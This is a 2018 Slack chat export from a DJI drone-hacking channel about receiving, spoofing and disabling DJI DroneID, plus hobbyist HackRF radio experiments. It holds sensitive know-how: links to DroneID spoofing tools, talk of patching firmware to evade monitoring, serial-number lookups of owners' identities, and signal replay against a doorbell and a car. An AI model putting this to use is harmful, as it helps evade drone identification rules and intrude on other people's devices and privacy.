[2018-06-05 00:59:37] hostile : not at all.. I'm always "hostile"... but I don't take kindly to folks with a chip on their shoulder IMHO talking out the side of their face as if they are an authority on something they clearly are not.

[2018-06-05 00:59:48] hostile : "You cant even give me one valid reason to show Mesmer" I don't need to...

[2018-06-05 00:59:53] hostile : I'm not the sales department that is calling you

[2018-06-05 01:00:03] hostile : and IF you were calling ME with that jive I'd tell you exactly where to go...

[2018-06-05 01:00:11] hostile : and that would be to have fun with your pile of Aeroscopes

[2018-06-05 01:00:25] sandwings247 : I have more than AeroScope

[2018-06-05 01:00:30] hostile : good...

[2018-06-05 01:00:36] sandwings247 : Corian

[2018-06-05 01:01:00] sandwings247 : I dont work for BITS or CACI either

[2018-06-05 01:01:04] hostile : "You cant even give me one valid reason to show why Corian is better than any other C-UAS system on the market today" :wink:

[2018-06-05 01:01:11] hostile : I could care less who you work for TBH

[2018-06-05 01:01:34] hostile : Aeroscope only works because of DroneID... and that implementation is trash

[2018-06-05 01:01:36] hostile : period

[2018-06-05 01:01:40] sandwings247 : LOL this is the best chat I've had all do

[2018-06-05 01:01:49] sandwings247 : day not do

[2018-06-05 01:02:42] hostile : cool... well have fun in Corian's world bro! Time to put my son to bed

[2018-06-05 01:03:18] hostile : and find yourself another throwaway email address to make your way back in. **shrug**

[2018-06-05 06:11:04] mathieu.peyrega : @ender did you had enough pop-corns ? I love those US TV shows but they are really broadcasted too late here, and the replay doesn't always have the same taste...

[2018-06-05 06:14:50] hostile : yeah ain't no one got time for that

[2018-06-05 06:15:16] hostile : most of the spooky folks in here keep to their business. I'm not all about someone in here mouthing off like they are holding ME up from a sale.

[2018-06-05 06:15:18] hostile : F that

[2018-06-05 06:15:30] hostile : welcome to the short ban list

[2018-06-05 06:15:31] hostile : heh

[2018-06-05 12:52:17] ender : Yup, Popcorn was yummie :wink:

[2018-06-05 12:53:24] validat0r : why did you kick him?

[2018-06-05 13:37:07] hostile : because he was the kind of troll that I'm simply not going to allow here. One claiming to be operating in the space of **using** commercial CUAS platforms, and implying he is part of the groups that do CUAS testing for .mil / .gov, etc. That is all fine, but don't come into **my** home saying "I don't like the product you make" sans any technical info as to why, etc. Then to be basically DJI sympathetic (was strange). And of course our product as any will have its short comings, but he seemed slightly misinformed, but dangerous enough to know **some** stuff as it were.

[2018-06-05 13:40:02] validat0r : So Mesmer is the A-UAV product of D13?

[2018-06-05 13:40:08] hostile : yes

[2018-06-05 13:40:54] validat0r : comes with a shoulder mounted raygun?

[2018-06-05 13:42:30] hostile : lol No!

[2018-06-06 03:02:59] lolo780 : Wow mr sandwings sure has an attitude

[2018-06-06 03:57:11] hostile : yeah not exactly sure where he thought he was lol

[2018-06-06 13:03:36] eseven : Oh man! Even with your oponents, you have a chance to get knowledgment on how to improve a product...

[2018-06-06 13:06:02] mathieu.peyrega : lol, you mean even when oponnent tells "I don't like what you do. period" ?

[2018-06-06 13:07:52] hostile : lol @miliu00 I’m well aware of the limitations of the product. I already drive the QA team nuts. :wink: This guy was playing with dated info and a chip on his shoulder. Ain’t no one got time for that

[2018-06-06 13:34:32] eseven : I completetly agree on no wasting time with trolls! At least on droneid thread where there will be only technical information exchange.

[2018-06-08 21:45:47] kyokushin : From which version these sliders appeard? I cant find them in 4.1.22 and 4.1.3. Also i was unable to find them in 4.1.14.

[2018-07-05 02:14:58] ben_lin : Is there a way to completely disable droneId?

[2018-07-05 02:14:58] ben_lin : Any documentation on this?

[2018-07-05 02:28:26] ben_lin : I remember @hostile you were talking about spoofing it…

[2018-07-05 02:55:48] hostile : attach this to your drone =] <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie>

[2018-07-05 02:55:58] hostile : or run this on a raspi <https://github.com/DJISDKUser/metasploit-framework/tree/DJIDroneIDSpoof>

[2018-07-05 02:56:11] hostile : depends on the bird... but you need to neuter the kernel modules

[2018-07-05 02:56:27] hostile : someone in her patched one of the dji_* libraries to not relay i ton too

[2018-07-05 02:56:32] hostile : dji_hdtv or what ever it was

[2018-07-05 03:01:11] validat0r : dji_network

[2018-07-05 08:11:15] ben_lin : lmao

[2018-07-05 08:11:29] ben_lin : imma test this shit in Beijing

[2018-07-05 09:42:15] validat0r : is droneid monitored in beijing?

[2018-07-05 11:58:38] hostile : HEAVILY

[2018-07-05 11:58:42] hostile : even more so than in the states

[2018-07-05 11:58:56] hostile : you can get real name and phone number of .cn folks

[2018-07-05 11:59:05] hostile : via a serial number API

[2018-07-05 12:07:36] validat0r : holy shit

[2018-07-05 12:08:54] jezzab : **cough** UUID **cough**

[2018-07-05 12:10:06] validat0r : ?

[2018-07-05 12:24:23] hostile : your uniquely identifyable user id ...

[2018-07-05 12:24:30] hostile : can be used to make these queries

[2018-07-05 12:28:23] validat0r : I have a user id? can't imagine

[2018-07-05 13:30:24] hostile : lol everyone does

[2018-07-05 13:30:30] hostile : if you use DJI go, you have a uuid

[2018-07-05 13:30:45] hostile : when you login the first time, it is associated with your email address

[2018-07-05 13:38:20] jezzab : FC might even hold the last 5... date, time etc... ;)

[2018-07-05 13:39:07] jezzab : Be afraid

[2018-07-05 13:45:01] validat0r : I never logged in to DJI .. nor have an account there

[2018-07-05 13:45:09] validat0r : hence no UUID

[2018-07-05 13:45:23] ben_lin : Welp I guess I need to figure this out

[2018-07-05 13:47:29] ben_lin : Wait, is DroneID controlled by the FC or DJIGO?

[2018-07-05 13:47:58] validat0r : by the dji_network process on the AC

[2018-07-05 13:48:36] ben_lin : So with root access we can get in there and permanently remove it?

[2018-07-05 13:50:17] jezzab : Anything is possible

[2018-07-05 13:50:33] ben_lin : :?

[2018-07-05 13:50:55] ben_lin : Wonder which module is responsible for this

[2018-07-05 13:51:10] ben_lin : If it is the FC module than I am good…

[2018-07-05 13:51:37] validat0r : you're confusing things

[2018-07-05 13:52:01] ben_lin : ? Is it not part of the firmware?

[2018-07-05 13:53:14] validat0r : sure

[2018-07-05 13:59:08] hostile : depends on the bird, but bascally either radio firmware, or wifi kernel module is responsible, and I think dji_network handles some of the information relay

[2018-07-05 14:00:04] hostile : roll pitch yaw will be pulled from FC of course

[2018-07-05 14:01:35] ben_lin : :( So much work to do just to enjoy a quad

[2018-07-05 14:21:43] ben_lin : @hostile Do you think NLD would be able to add an aeroscope patch in the future?

[2018-07-05 14:21:56] ben_lin : To simply disable it

[2018-07-05 14:30:30] hostile : @coldflake...

[2018-07-05 14:56:26] ben_lin : .

[2018-07-05 15:06:30] hostile : @ben_lin (he manages that codebase)

[2018-07-05 15:10:53] nocommie : Better yet, the option to enter whatever text/location you want displayed.

[2018-07-05 15:11:59] validat0r : that should be way more difficult .. :smile:

[2018-07-10 14:54:14] mathieu.peyrega : Hi, does anyone have an idea of kismet support level on raspberry pi 3B+ (the new one that supports 5GHz) ?

[2018-07-10 14:54:36] mathieu.peyrega : will it handle droneId correctly ?

[2018-07-10 15:29:35] hostile : as long as you have an atheros m.2. / pci card...

[2018-07-10 15:29:42] hostile : if it isn't atheros... it isn't happening

[2018-07-10 15:30:04] hostile : you can spoof from a pi , but not receive it

[2018-07-10 15:42:15] mathieu.peyrega : thanks... i have one of these :<http://www.shuttle.eu/fileadmin/resources/download/docs/spec/barebones/DS67U7_e.pdf> will go find a good replacement card for it...

[2018-07-10 15:42:42] mathieu.peyrega : I already replaced the one in my laptop to support triple boot...

[2018-07-10 16:03:09] mathieu.peyrega : found a used Atheros qca6174a-5

[2018-07-10 16:03:17] mathieu.peyrega : hoope that will fit and do the job

[2018-07-10 20:48:38] eseven : Ar92xx with different flavors....

[2018-07-12 01:34:05] antihawk : @antihawk has joined the channel

[2018-07-13 21:05:20] aciid : what frequency does droneid show up on?

[2018-07-13 21:15:51] hostile : the c2 link of the bird you as using.

[2018-07-13 21:15:57] hostile : aka if you fly wifi it shows on wifi

[2018-07-13 21:16:04] hostile : if you fly occusync, it shows on occysync

[2018-07-13 23:22:21] aciid : @hostile ok thanks, going to dig into the basics of this today.

[2018-07-14 14:20:49] aciid : @mathieu.peyrega does interfacing with droneid require a specific type of device? I have a well known and supported Ralink RT3572 (ALFA AWUS051NH v2). anbnd couldnt see shit

[2018-07-14 14:20:58] aciid : im just learning about this

[2018-07-14 14:22:01] mathieu.peyrega : i'm also learning in that field... it seems the the Wifi chip need to be Atheros brand and not a USB one (PciE i.e. internal...)

[2018-07-14 14:22:31] mathieu.peyrega : @hostile is guru there... I guess @atlas is kind of one too

[2018-07-14 14:22:47] mathieu.peyrega : I ordered recently a wifi card that should work but have not received it yet

[2018-07-14 14:23:13] aciid : I have a realtek and ralink chips. I think I have a atheros somewhere too have to dig around

[2018-07-14 14:23:27] aciid : does the data show up on kismet or do you need some other app?

[2018-07-14 14:30:07] aciid : found an athers dwa-574 from the drawer

[2018-07-14 14:30:12] aciid : brb booting to attach this

[2018-07-14 14:34:32] aciid : and it was a PCI-card

[2018-07-14 14:34:34] aciid : not PCIe

[2018-07-14 14:34:36] aciid : so nope

[2018-07-14 14:34:43] aciid : going to [amazon.de](http://amazon.de)

[2018-07-14 14:36:09] validat0r : shows up on kismet .. you need to switch to 5Mhz wide channels

[2018-07-14 14:39:42] aciid : I probably have this in garage <https://wikidevi.com/wiki/ALFA_Network_AWUS036NHA>

[2018-07-14 14:40:05] validat0r : 5Ghz is sometimes tricky. you could switch to 2,4Ghz and try again.

[2018-07-14 14:40:31] validat0r : and you need latest Kismet from github

[2018-07-14 21:33:56] aciid : is the bssid a part of mavics serial number?

[2018-07-14 21:34:19] aciid : what im asking is any identifiable data going unencrypted

[2018-07-16 00:04:07] hostile : @aciid ONLY the ath9k works for droneid wifi... due to the 5mhz channel special stuff.

[2018-07-16 00:04:21] hostile : MUST be Pci, or M.2 format card.

[2018-07-16 00:04:47] hostile : you then need to change kismet conf to add the 5mhz channels

[2018-07-16 03:36:31] aciid : thanks ill start looking for this kind of a card

[2018-07-17 15:53:48] hostile : set the channel topic: a known working Atheros ath9k is Atheros QCNFA222 AR5BWB222

[2018-07-18 16:56:43] mathieu.peyrega : <https://www.entreprises.gouv.fr/files/files/directions_services/numerique/consultations-publiques/2018-06-01-Synthese-consult-drones.pdf>

[2018-07-18 16:56:57] mathieu.peyrega : result for the public consultation about the french droneId project

[2018-07-18 18:38:57] hostile : ```Summary of contributions received during the public consultation Texts relating to civil drones Under Article L. 32-1 V of the Post and Electronic Communications Code, the DGE conducted a public consultation online, from April 13 to May 5, 2018. This consultation was the subject of 89 contributions: 10 contributions from operators and federations and 79 contributions from individual model aircraft. Almost all of these contributions expressed strong reservations on several points of the texts submitted for consultation. 1 - Electronic reporting (draft decree and order): The contributions received focused on the following points: a) Legal aspects - the entry into force of the national texts coincides with the preparation of the European regulation on the same subject, which risks creating instability of the regulation even contradictions; - the deadlines for the implementation of the texts are considered unsuitable with regard to the duration of the production cycle of a drone; - maladjustment of the texts to the model aircraft activity: it was recommended to distinguish between model aircraft controlled by sight which should be exempted from regulation and not controlled by sight which would be subject to regulation. It was also recommended that the exemptions should not be limited to only aeromodelists practicing in nationally recognized federations. b) Technical aspects - the risk of interference with other equipment using wifi; - the potential for interference between UAV control systems and electronic reporting devices using the same frequency band; - the risk of imbalance of the device and loss of autonomy related to the addition of an add-on; - securing and encrypting the transmission of GPS data; - it was recommended that the identification number be that of the manufacturer of the drone in accordance with the European text. 07/10/2018 2 - The luminous signaling (draft decree and decree): 2/2 The contributions received focused on the following points: a) Legal aspects - the entry into force of the national texts coincides with the preparation of the European regulation on the same subject, which risks creating instability of the regulation even contradictions; - the deadlines for the implementation of the texts are considered unsuitable with regard to the duration of the production cycle of a drone; - maladjustment of the texts to the model aircraft activity: it was recommended to distinguish between model aircraft controlled by sight which should be exempted from regulation and not controlled by sight which would be subject to regulation. It was also recommended that the exemptions should not be limited to only aeromodelists practicing in nationally recognized federations. b) Technical aspects - it was recommended to choose a color for the signaling light; - the code U in Morse has been considered too complicated to implement in view of its usefulness; - the luminous device was considered superfluous and not very useful with regard to electronic reporting and security needs; - it was recommended to limit the obligation to use a reporting device to only night flights; - the risks of imbalance and loss of autonomy induced by the addition of a light device. 3- The mass threshold (draft simple decree): The contributions received focused on the following points: - the fact that these texts have a particular impact on the model aircraft because of the chosen mass threshold; - the contradiction with the European regulation which sets a threshold at 900 grams.```

[2018-07-18 18:51:32] aciid : silly morse signals lol

[2018-07-18 18:52:18] aciid : I think they will just restrict the overall weight of the drones so they cant push payload into prison etc

[2018-07-18 18:53:01] aciid : "cant" is wrong word.

[2018-07-20 17:21:37] mathieu.peyrega : Hi, received my pcie... but it's an ath10k driver chip and not ath9k, will it be ok ?

[2018-07-20 20:17:25] makingthisnameup : Wait wait we can't drop payloads into prisons anymore? Whutoh.

[2018-07-20 20:22:36] makingthisnameup : They should put up a sign of some sort

[2018-07-21 15:32:24] hostile : @mathieu.peyrega I can't recall if ath9k is close enough that it can also tune to 5mhz

[2018-07-21 15:32:42] hostile : try this:

[2018-07-21 15:32:44] hostile : source=wlan10k0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"

[2018-07-21 15:32:47] mathieu.peyrega : I'm going to test this afternoon

[2018-07-21 15:32:52] hostile : see if it works in your kismet config

[2018-07-21 15:33:27] mathieu.peyrega : i'm in my RF discovery days :slightly_smiling_face: (been buying a hackrf one too and playing with it, but the vendor messed up and sent me a 22.625 TCXO instead of 10 MHz so I can't play with GPS stuff)

[2018-07-21 15:33:30] hostile : set the channel topic: a known working Atheros ath9k is Atheros QCNFA222 AR5BWB222 you also MUST change the channel list: source=wlan0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"

[2018-07-21 15:51:11] mathieu.peyrega : those settings goes on the cmdline args or config file ?

[2018-07-21 15:51:26] hostile : in the ksimet config file

[2018-07-21 15:51:37] hostile : either kismet.conf or kismet_site.conf

[2018-07-21 15:51:49] mathieu.peyrega : thx

[2018-07-21 15:56:57] aciid : <https://www.aliexpress.com/item/HackRF-One-usb-platform-reception-of-signals-RTL-SDR-Software-Defined-Radio-1MHz-to-6GHz-software/32808682100.html>? I bought this from here

[2018-07-21 16:23:46] mathieu.peyrega : getting errors could not set any channel... after a clean compile (including erasing old config files)

[2018-07-21 16:33:03] validat0r : Yeah. Some channels will disappear after a while. The question is if some channels will remain

[2018-07-21 16:33:21] mathieu.peyrega : none appear here...

[2018-07-21 16:33:51] mathieu.peyrega : ath10k is reported to have issues in the readme...

[2018-07-21 16:34:08] hostile : yeah ath10k driver is shit

[2018-07-21 16:34:12] hostile : lots of spurrious data

[2018-07-21 16:34:17] hostile : bad FCS

[2018-07-21 16:34:19] mathieu.peyrega : I thought I ordered a ath9k... not for the 5€ but they take ages to get delivered

[2018-07-23 19:30:32] mathieu.peyrega : playing with hackRF... I understand the "U" and "O" i'm getting i the console, but I also get "a" and not finding what this means ? anyone has an idea ?

[2018-07-23 19:30:47] aciid : which app you are refering to?

[2018-07-23 19:31:10] aciid : I have hackRF too, and a antenna I've "set to 2.4ghz" , can we be friends and try to figure droneid together?

[2018-07-23 19:31:17] mathieu.peyrega : gnuradio companion

[2018-07-23 19:31:27] mathieu.peyrega : UaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaU

[2018-07-23 19:32:23] aciid : I can't get hackRF and gnuradio companion to work in Windows

[2018-07-23 19:32:56] mathieu.peyrega : I'm really "new" to those RF things... going throw Mike Osmann video course atm... Just figured out what I/Q representation links to real signal power... (something I never understood before !!) so maybe it's a little early to tackle droneId with thie for me

[2018-07-23 19:33:10] mathieu.peyrega : but I hope to grab more skills and be able to help !

[2018-07-23 19:33:47] aciid : which platform are you on where GNUradio works with hackrf?

[2018-07-23 19:33:52] aciid : I have VM's and a mac and stuff

[2018-07-23 19:33:57] mathieu.peyrega : Ubuntu Mate 18.04

[2018-07-23 19:34:11] mathieu.peyrega : I can try on Windows 2...

[2018-07-23 19:34:25] aciid : its not working for me doesn't list in osmocom

[2018-07-23 19:34:28] mathieu.peyrega : I've been able to setup a few stuff on the Windows boot but did not tried gnu radio yet

[2018-07-23 19:34:30] aciid : which is the driver

[2018-07-23 19:34:34] aciid : yeah don't bother

[2018-07-23 19:34:39] aciid : linux is better

[2018-07-23 19:35:31] mathieu.peyrega : been trolling kids with doorbell replay :slightly_smiling_face:

[2018-07-23 19:36:10] mathieu.peyrega : now trying to have the roof window shutter controlled, but seems the simple replay is not working

[2018-07-23 19:36:12] aciid : hey youve done more than me then

[2018-07-23 19:36:45] mathieu.peyrega : the replay agains my car works if car did not grabbed the signal at first...

[2018-07-23 19:36:59] mathieu.peyrega : already this is quite amazing I think

[2018-07-23 19:37:35] mathieu.peyrega : I ca pretty much check when a phone call takes palce

[2018-07-23 19:37:47] mathieu.peyrega : (very few antennas around my place)

[2018-07-23 19:38:17] aciid : i use a 0-6ghz "radio" antenna that is set to 2.34feet

[2018-07-23 19:38:22] aciid : to get 2400mhz

[2018-07-23 19:40:43] mathieu.peyrega : intiial thing I wanted to play with was emulating GPS signal, but I do not have the correct TCXO yet... vendor messed up

[2018-07-23 19:42:42] aciid : I got a clock chip with my order

[2018-07-23 19:42:46] aciid : this thing that sits on top

[2018-07-23 19:43:14] mathieu.peyrega : right, mine is 22.625 MHz instead of 10 MHz

[2018-07-23 19:43:25] mathieu.peyrega : so not usable...

[2018-07-23 19:44:19] aciid : mine says txco 10.000000mhz

[2018-07-23 19:44:43] aciid : not correct I assume?

[2018-07-23 19:44:47] aciid : it came from aliexpress

[2018-07-23 19:51:04] aciid : @mathieu.peyrega ok i got hackrf working with ubunt 1604 + gnuradio companion

[2018-07-23 19:53:27] aciid : <https://www.scip.ch/en/?labs.20170622>

[2018-07-23 19:53:51] aciid : this should work with gnuradio companion too

[2018-07-23 19:59:34] mathieu.peyrega : this one : <https://github.com/pavsa/hackrf-spectrum-analyzer> works pretty well

[2018-07-23 19:59:35] mathieu.peyrega : <https://github.com/pavsa/hackrf-spectrum-analyzer>

[2018-07-23 21:52:26] jezzab : `sudo apt-get install gr-osmosdr` from memory. You have to install it

[2018-07-23 21:53:15] aciid : I installed pothosware SDR package, <https://github.com/pothosware/PothosCore/wiki/Ubuntu>

[2018-07-23 21:54:02] aciid : thanks!

[2018-07-23 23:51:24] fredmicrowave : Many garage door and similar remote control systems use rolling code. In such cases replaying the TX code will not work...

[2018-07-24 15:37:39] mathieu.peyrega : amazing !

[2018-07-24 15:42:03] hostile : man I can remember this feeling

[2018-07-24 15:42:07] hostile : haha congrats bro

[2018-07-24 15:42:20] hostile : next ephemeris data, then conquering the world!

[2018-07-24 15:43:23] aciid : woah which antenna is that with?

[2018-07-24 15:44:40] mathieu.peyrega : it's with this antenna : <https://www.tersus-gnss.com/product/antenna-ax3705> but as a surveyor and gnss lover, I have a bunch of different antennas here...

[2018-07-24 15:44:52] mathieu.peyrega : I even have some I'd better sell

[2018-07-24 15:47:10] aciid : $160

[2018-07-24 15:47:11] aciid : uuff

[2018-07-24 15:48:05] mathieu.peyrega : it's because it's L1+L2

[2018-07-24 15:48:22] mathieu.peyrega : you can find cheap L1 only active antenna that would probably work too...

[2018-07-24 15:48:25] mathieu.peyrega : will try one later

[2018-07-24 15:48:40] mathieu.peyrega : it's upstairs in the cavern and i'm lazy

[2018-07-24 15:59:15] aciid : I have some automotive grade GPS antennas here

[2018-07-24 15:59:39] aciid : <https://www.adafruit.com/product/960> these

[2018-07-24 15:59:56] aciid : looks like that but I dont think its boosted

[2018-07-24 16:06:58] aciid : found my TELIT XE910 module antennas

[2018-07-24 16:07:27] aciid : AMOTECH AGA363913-S0-A5

[2018-07-24 16:37:05] mathieu.peyrega : just for the record of you hackrf users... I had to do this : <https://unix.stackexchange.com/questions/91027/how-to-disable-usb-autosuspend-on-kernel-3-7-10-or-above> to disable autosuspend on USB on my laptop, otherwise the hackrf was not detected consistently...

[2018-07-24 16:37:30] mathieu.peyrega : @mathieu.peyrega uploaded a file: [Sans titre](https://dji-rev.slack.com/files/U84HERNVC/FBX56RYQ7/-.pl)

[2018-07-24 16:38:45] mathieu.peyrega : @aciid ; gnss-sdr also works with a basic low cost L1 only antenna like this one : <https://www.amazon.fr/Antenne-Distance-Adaptateur-Connecteur-1575-42MHz/dp/B074V12W73/ref=sr_1_4?ie=UTF8&qid=1532450296&sr=8-4&keywords=antenne+GPS+sma>

[2018-07-24 16:42:11] aciid : i think this works which ih ave but I need to install gnss-sdr. i have a custom gr-osmos so i need to make a new virtual machine

[2018-07-24 16:42:23] aciid : pothosware SDR did that fckup

[2018-07-24 19:22:52] mathieu.peyrega : playing also with shinysdr at time...

[2018-07-24 19:22:56] mathieu.peyrega : this is amazing !

[2018-07-24 19:23:20] mathieu.peyrega : @mathieu.peyrega uploaded a file: [image.png](https://dji-rev.slack.com/files/U84HERNVC/FBXH82UMU/image.png)

[2018-07-24 22:43:56] jakub : @mathieu.peyrega what RX you are using atm?

[2018-07-25 21:59:28] aciid : I used hostiles nodeMCU code for droneID

[2018-07-25 21:59:31] aciid : god damn that thing is loud

[2018-07-25 22:00:26] aciid : i tried decoding it, but it went off the charts

[2018-07-25 22:00:38] aciid : probably need to have it somewhere else than on my desk

[2018-07-31 23:23:10] aciid : @sami.keskinen

[2018-07-31 23:23:13] sami.keskinen : @sami.keskinen has joined the channel

[2018-08-02 08:36:10] aciid : woo my Atheos ATH9k arrived

[2018-08-02 08:38:42] validat0r : cool. please test and report :slightly_smiling_face:

[2018-08-02 08:43:54] aciid : I will, I have a laptop in the garage ill fit this into, my workhorse doesn't have slots

[2018-08-02 08:44:40] validat0r : which card model is it?

[2018-08-02 08:47:45] aciid : <https://www.ebay.com/itm/Atheros-QCNFA222-AR5BWB222-802-11a-b-g-n-2-4-5GHz-BT4-0-WIFI-WLAN-Card-4K380-M-2/272410262909?ssPageName=STRK%3AMEBIDX%3AIT&_trksid=p2057872.m2749.l2649>

[2018-08-02 08:47:59] aciid : <https://www.ebay.com/itm/M-2-NGFF-to-Mini-PCI-E-Adapter-Converter-for-Intel-9260-9560-8265-WIFI-Module/282933753147?ssPageName=STRK%3AMEBIDX%3AIT&_trksid=p2057872.m2749.l2649>

[2018-08-02 08:48:02] aciid : same seller

[2018-08-02 09:43:47] aciid : I hope UFL is same size for m2 boards than its mpcie

[2018-08-02 10:27:28] ender : it usually ALWAYS is !

[2018-08-02 11:58:15] aciid : im going to get the laptop now to fit that

[2018-08-02 14:44:17] aciid : @hostile I get Packet source wlan0mon failed to set channel 14 mac80211_setchannel could not set channel 14/2484. but most of the custom channels work in your list im using kali kismet

[2018-08-02 14:44:35] hostile : that is fine

[2018-08-02 14:44:40] hostile : some cards can't tune to certain channels

[2018-08-02 14:44:44] hostile : and kismet auto kicks them out

[2018-08-02 14:45:00] validat0r : do you see droneids?

[2018-08-02 14:45:01] hostile : sounds like you are up now?

[2018-08-02 14:45:20] aciid : yup just got everything configured, starting RC and AC now

[2018-08-02 14:45:21] hostile : you should at least see the WEP adhoc connection

[2018-08-02 14:45:31] validat0r : set to 5 MHz chans

[2018-08-02 14:45:56] aciid : I used the line we have on topic which had n-chanW5 per channel

[2018-08-02 14:46:03] validat0r : ok

[2018-08-02 14:46:05] aciid : does that do the trick

[2018-08-02 14:46:08] aciid : or is there more parameters

[2018-08-02 14:46:12] hostile : as long as the interface name matches

[2018-08-02 14:46:15] hostile : you should be good

[2018-08-02 14:46:57] aciid : it should, I added the channellist to config via "channellist=DJI:nönönönönönönnönö" then started kismet kismet -c wlan0mon:channellist=DJI

[2018-08-02 14:47:08] validat0r : props have to spin to make the ac emit droneids

[2018-08-02 14:47:31] aciid : acknowledged, Ill take the props off

[2018-08-02 14:47:52] validat0r : wise precaution

[2018-08-02 14:48:03] aciid : ye I have 2 cats

[2018-08-02 15:02:40] aciid : it's not working, or do I have to have DroneID enabled from the DJI GO4 app?

[2018-08-02 15:02:51] aciid : I don't have my phone connected at all to the RC now

[2018-08-02 15:04:26] validat0r : to rule out problems on 5GHz, you could set the AC-RC connections to 2,4Ghz .. that way I was able to see packets with my ancient T41p wifi card

[2018-08-02 15:04:56] aciid : ill connect my phone then

[2018-08-02 15:05:42] validat0r : from what I understand you cant really switch droneid off (on recent firmwares at least)

[2018-08-02 15:05:54] aciid : this is a recent one yeah

[2018-08-02 15:05:57] aciid : adn stock iOS app

[2018-08-02 15:06:13] validat0r : (well you can, but not when dji gets its way)

[2018-08-02 15:08:06] aciid : must be some other problem

[2018-08-02 15:09:10] aciid : maybe my notation on channelwidth is wrong

[2018-08-02 15:10:51] validat0r : there should be plenty of xxW5 channels listed in kismet when you start .. (and some of them will probably grey out after a couple of minutes)

[2018-08-02 15:12:14] validat0r : droneid packets will list as "WiFi Adhoc"

[2018-08-02 15:12:40] hostile : @aciid you should see the bare mac addresses of the cards in adhoc mode ...

[2018-08-02 15:12:46] hostile : don't worry about "droneid" yet

[2018-08-02 15:12:50] hostile : do you see the adhoc?

[2018-08-02 15:13:11] hostile : show me a picture of your kismet interface

[2018-08-02 15:13:23] hostile : and you are using kismet from git, right?

[2018-08-02 15:18:39] aciid : not from git , could be a problem

[2018-08-02 15:22:03] validat0r : yeah .. you need the version from git

[2018-08-02 15:23:24] aciid : ill get back on this after it compiles

[2018-08-02 15:31:23] hostile : yeah MUST be from git

[2018-08-02 15:38:12] aciid : gonna make me a sandwitch its taking a while to compile

[2018-08-02 16:24:27] aciid :

[2018-08-02 16:25:29] validat0r : dont see any dji device

[2018-08-02 16:25:33] aciid : me neither

[2018-08-02 16:26:08] aciid : sure that this is enabled in european union?

[2018-08-02 16:26:24] validat0r : you think they make that gps dependant?

[2018-08-02 16:26:40] validat0r : well on spark they dont

[2018-08-02 16:26:45] aciid : well it's not getting GPS fix on AC and no homepoint when im inside

[2018-08-02 16:26:50] aciid : should I got try outside?

[2018-08-02 16:27:11] validat0r : you could try

[2018-08-02 16:27:35] aciid : ill go, seems funny, I have the chipset that hostile recommended

[2018-08-02 16:27:46] aciid : one that should work

[2018-08-02 16:27:48] aciid : and many more

[2018-08-02 16:27:48] validat0r : is it a mavic?

[2018-08-02 16:27:54] aciid : yes

[2018-08-02 16:28:21] validat0r : dont know how the occusync stuff plays into that

[2018-08-02 16:30:10] validat0r : do you have a screenshot of the other screen where you can see which channels the card listens to?

[2018-08-02 16:30:57] validat0r : there are many W5 channels in the log with "unable to set frequency"

[2018-08-02 16:31:15] validat0r : i wonder which chans are left over

[2018-08-02 16:32:31] hostile : you will NOT pick up occusync with a 2.4ghz wifi radio...

[2018-08-02 16:32:48] hostile : ONLY works with Mavic Air and Spark

[2018-08-02 16:32:55] hostile : cuz the use Wifi Chips...

[2018-08-02 16:32:57] validat0r : occu is 5GHz only?

[2018-08-02 16:33:03] hostile : its a different radio

[2018-08-02 16:33:10] hostile : completely unrelated to wifi chipset

[2018-08-02 16:33:28] hostile : a) the SDR code is not public and anyone that has it knows that, certainly would not share it for free

[2018-08-02 16:33:47] hostile : b) there is no public Occusync protocol **anything** including droneid

[2018-08-02 16:33:53] validat0r : so this method doesnt work with mavic anyway?

[2018-08-02 16:34:03] hostile : not unless it is a mavic air

[2018-08-02 16:34:10] hostile : or a mavic set to wifi mode connected to phone

[2018-08-02 16:34:24] validat0r : ok. maybe someone should have mentioned that to aciid .-D

[2018-08-02 16:34:24] hostile : kismet is explicitly a wifi tool...

[2018-08-02 16:34:29] aciid : Hah

[2018-08-02 16:34:34] hostile : it is inherent in understanding the chipsets, etc

[2018-08-02 16:34:49] hostile : Occusync is NOT wifi

[2018-08-02 16:35:02] hostile : there is 100% no way in fuck you are going to see occysync traffic with your normal wifi stack

[2018-08-02 16:35:03] hostile : period

[2018-08-02 16:35:05] validat0r : I was under the impression that droneid packets were still receivable with standard W5 wifi

[2018-08-02 16:35:09] hostile : no

[2018-08-02 16:35:21] hostile : Mavic Air and Spark use 5mhz wifi...

[2018-08-02 16:35:42] hostile : and as such we can tune to it and see it and decode the drone id with in

[2018-08-02 16:36:04] hostile : drone id ONLY transmits on the interface you use for c2

[2018-08-02 16:36:24] validat0r : c2?

[2018-08-02 16:36:25] hostile : its not just gonna start tossing out 5mhz wifi packets when there isn't even wifi hardware or connectivity present.

[2018-08-02 16:36:29] hostile : "command & control"

[2018-08-02 16:37:14] validat0r : well, aciid .. you have a spark or an air laying around?

[2018-08-02 16:38:25] aciid : Well no, but i found something interesting. When i turned on droneid manually, my phone appeared on the list as a individual mac address. Not as a client to my home wifi

[2018-08-02 16:38:56] validat0r : how do you turn on droneid manually?

[2018-08-02 16:39:18] aciid : Ill show you a screenshot

[2018-08-02 16:39:50] hostile : most phones beacon wifi constantly...

[2018-08-02 16:39:59] hostile : this is not surprising

[2018-08-02 16:40:26] validat0r : yeah, probably a coincidence you saw it appearing right in that moment

[2018-08-02 16:41:39] validat0r : so it's sdr-time for you, aciid ..

[2018-08-02 16:42:41] aciid : Well luckily i have ton of shit equipment to play with

[2018-08-02 16:44:38] validat0r : how far are the efforts to decode occusync publicly?

[2018-08-02 16:48:20] hostile : none

[2018-08-02 16:48:23] hostile : it is too valuable

[2018-08-02 16:48:26] hostile : doubt it will happen

[2018-08-02 16:48:42] hostile : anyone with the skills to do it has already been courted by counter UAS companies.

[2018-08-02 16:52:22] validat0r : i wonder whether the c2 over wifi and occu is tamper proof ..

[2018-08-02 16:54:36] hostile : heh no

[2018-08-02 16:54:58] hostile : keep in mind D13 MESMER has Spark and Mavic air "mitigations"

[2018-08-02 16:55:06] hostile : also Lightbridge...

